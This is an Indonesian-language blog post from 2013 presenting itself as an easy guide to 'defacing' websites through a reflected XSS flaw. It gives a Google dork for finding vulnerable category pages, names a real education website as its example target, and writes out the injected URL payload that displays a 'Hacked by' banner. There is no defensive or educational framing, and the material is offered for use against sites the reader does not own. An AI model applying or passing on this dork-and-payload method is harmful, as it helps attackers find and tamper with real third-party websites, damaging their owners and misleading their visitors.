Minggu, 07 April 2013

Cara Deface sangat Mudah dengan XSS Vulnerability

Post oleh : Unknown | Rilis : 09.22 | Series :
1.Pertama Masukin Dorknya
inurl:"/showcatrows.php?CategoryID="

2.Pilih Web yg ingin di deface
Kalo saya pakai ini http://www.examsolutions.co.uk/maths-rev...egoryID=13

3.Jika sudah masuk ke halaman web ,modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.
Kalo saya pake yg simple aja 
http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>

4.Jika Sudah Tekan "ENTER"

5.Lihat hasil ,apakah yg terjadi

caranya memang sangat simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

Credit : HackForJihad

google+

linkedin